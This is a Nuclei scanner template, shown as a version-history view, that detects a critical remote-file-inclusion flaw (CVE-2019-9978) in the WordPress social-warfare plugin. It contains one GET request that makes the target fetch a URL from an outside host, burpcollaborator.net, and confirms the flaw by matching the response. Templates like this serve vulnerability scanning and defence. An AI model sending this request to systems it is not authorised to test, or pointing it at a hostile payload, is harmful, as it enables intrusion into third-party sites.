nuclei-templates/cves/CVE-2019-9978.yaml

22 lines
499 B
YAML
Raw Normal View History

2020-08-12 15:05:52 +00:00
id: CVE-2019-9978
info:
name: WordPress social-warfare RFI
author: madrobot & dwisiswant0
2020-08-17 06:02:37 +00:00
severity: critical
2020-08-12 15:05:52 +00:00
2020-08-12 15:12:50 +00:00
# Reference:- https://github.com/mpgn/CVE-2019-9978
2020-08-12 15:05:52 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://burpcollaborator.net"
2020-08-12 15:05:52 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Burp Collabolator Server"
2020-08-12 15:12:50 +00:00
part: body